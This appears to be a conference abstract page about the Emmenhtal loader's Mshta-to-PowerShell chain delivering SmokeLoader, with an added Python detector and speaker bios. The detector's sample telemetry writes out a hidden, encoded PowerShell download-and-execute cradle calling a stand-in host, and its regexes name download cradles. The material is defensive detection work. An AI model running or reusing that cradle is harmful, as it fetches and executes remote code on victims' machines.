This is a reserve paper. Should it not be required to replace a paper on the main programme, it will be presented in the Small Talks room on Friday 26 September.
Lovely Antonio, Ricardo Pineda & Louis Sorita (G Data AV Lab)
Modern malware distribution is evolving, with commodity loaders maturing into sophisticated malware-as-a-service (MaaS) platforms. One such loader, Emmenhtal, has emerged as a key player in financially motivated cybercrime, initially distributing infostealers such as CryptBot and Lumma. Recent campaigns, however, indicate a strategic pivot: Emmenhtal is now being paired with SmokeLoader, a well-established modular malware known for code injection, persistence and stealthy payload execution. This new distribution method has so far received little public attention.
This research dissects Emmenhtal's evasive execution flow, its strategic abuse of living-off-the-land binaries and scripts (LOLBAS) like Mshta and PowerShell for covert operation, and its growing significance in the malware-as-a-service landscape.
The primary focus of our research is a recent attack observed against First Ukrainian International Bank (pumb.ua), in which Emmenhtal facilitated a multi-stage infection chain designed to bypass traditional security controls. The campaign began with a phishing email carrying a 7z archive that contained a bait PDF and a downloader shortcut; the shortcut retrieved a malicious .lnk file. That .lnk file invoked Mshta to execute a hidden HTA script embedded inside a trojanized DCCW.exe binary, keeping the on-disk footprint inconspicuous. The HTA script interpreted the embedded JavaScript, which in turn launched an encoded PowerShell script responsible for downloading and executing the SmokeLoader payload.
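The LOLBAS abuse described in the two preceding paragraphs (Mshta pointed at a file that is not an .hta, followed by an encoded PowerShell stage that fetches the next payload) is easier to catch from process-creation telemetry than from file signatures. The Python below is an added example written for this page, not code from the authors or from G Data: it correlates constructed Sysmon-style process events (the PIDs, paths, command lines and URL are made up for the example) and flags mshta.exe launched against anything other than a .hta file, then decodes the -EncodedCommand argument of any descendant PowerShell process to expose the download cradle.

```python
"""Hypothetical detector for the mshta -> encoded-PowerShell chain.

Constructed example: the events below imitate Sysmon/EDR process-creation
records and are not telemetry from the campaign discussed in the talk.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # command line as logged


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _args(cmdline: str) -> list[str]:
    # Split a Windows command line, keeping quoted paths with spaces intact
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def mshta_suspicious_target(ev: ProcEvent) -> Optional[str]:
    """Return mshta's argument if it is anything other than a plain .hta file.

    mshta parses an HTA embedded in whatever file it is pointed at (here a
    trojanized executable) and also accepts javascript:/vbscript: URIs.
    """
    if _basename(ev.image) != "mshta.exe":
        return None
    for tok in _args(ev.cmdline)[1:]:
        if tok.startswith(("-", "/")):
            continue  # skip switches such as /embedding
        low = tok.lower()
        if low.startswith(("javascript:", "vbscript:", "about:")):
            return tok
        return None if low.endswith(".hta") else tok
    return None


# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
_ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode PowerShell's -EncodedCommand payload (base64 of UTF-16LE)."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


_CRADLE = re.compile(r"(DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|"
                     r"\biwr\b|Invoke-RestMethod|Start-BitsTransfer|Net\.WebClient)", re.I)
_URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def find_download_cradle(script: str) -> Optional[str]:
    """Return the URL (or '' if none is visible) when the script downloads something."""
    if not _CRADLE.search(script):
        return None
    m = _URL.search(script)
    return m.group(0) if m else ""


def analyze(events: list[ProcEvent]) -> list[dict]:
    """Flag mshta-on-non-HTA launches and walk their descendants for encoded PowerShell."""
    children: dict[int, list[ProcEvent]] = {}
    for ev in events:
        children.setdefault(ev.ppid, []).append(ev)
    findings = []
    for ev in events:
        target = mshta_suspicious_target(ev)
        if target is None:
            continue
        finding = {"pid": ev.pid, "mshta_target": target,
                   "stage": "mshta-non-hta", "script": None, "url": None}
        stack = list(children.get(ev.pid, []))
        while stack:  # depth-first over the process tree under mshta
            child = stack.pop()
            stack.extend(children.get(child.pid, []))
            if _basename(child.image) not in ("powershell.exe", "pwsh.exe"):
                continue
            script = decode_encoded_command(child.cmdline)
            if script is not None:
                finding.update(stage="mshta->encoded-powershell", script=script,
                               url=find_download_cradle(script))
        findings.append(finding)
    return findings


# Constructed stage-3 script, encoded the way "powershell -enc" expects it
STAGE3 = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/smk.ps1')"
ENC = base64.b64encode(STAGE3.encode("utf-16-le")).decode()

EVENTS = [  # constructed sample telemetry
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\mshta.exe",  # .lnk -> mshta on a trojanized PE
              r'"C:\Windows\System32\mshta.exe" "C:\Users\v\AppData\Local\Temp\dccw.exe"'),
    ProcEvent(3000, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -ep bypass -enc " + ENC),
    ProcEvent(4000, 1000, r"C:\Windows\System32\mshta.exe",  # benign control: a real .hta
              r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
]

if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f)
```

The mshta check alone is noisy in environments that legitimately use HTAs, which is why the example only escalates the finding to a chain alert once a descendant PowerShell process carries an encoded command; the decoded script, not the base64 blob, is what you want in the alert so that the download URL can be blocked.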
By understanding Emmenhtal's evolution and operational techniques, we will present how modern loaders are reshaping the threat landscape, and how we can refine our detection and mitigation strategies.
Lovely Antonio
Lovely has over 12 years of experience in the information security industry, specializing in threat research, analysis, and creating detection signatures. Recently, she has focused on curating training curricula and career programmes for employee upskilling. She has participated in malware research projects and previously presented at AVAR conferences. She is happily married to a fellow researcher, and they enjoy exploring foods and travelling together.
Ricardo Pineda
Ricardo has over 20 years of experience in the cybersecurity industry, specializing in threat research, analysis, and creating detection signatures. Throughout his career, he has contributed to developing advanced security measures, helping organizations stay ahead of emerging threats. In recent years, he has also focused on mentoring and knowledge-sharing, ensuring the next generation of cybersecurity professionals is well equipped to tackle evolving challenges. Happily married for 12 years, Ricardo enjoys spending time with his family, including his two children. Outside of work, he is an avid RPG gamer, finding relaxation and creativity in immersive story-driven worlds.
Louis Sorita
Louis is a seasoned cybersecurity professional with 12 years of experience in the field. As a senior virus analyst, he specializes in threat research and detection, proactive threat hunting, and delivering internal cybersecurity training to enhance organizational resilience. Recently entering married life, Louis also enjoys playing video games, particularly soulslike titles that challenge his strategic thinking and perseverance.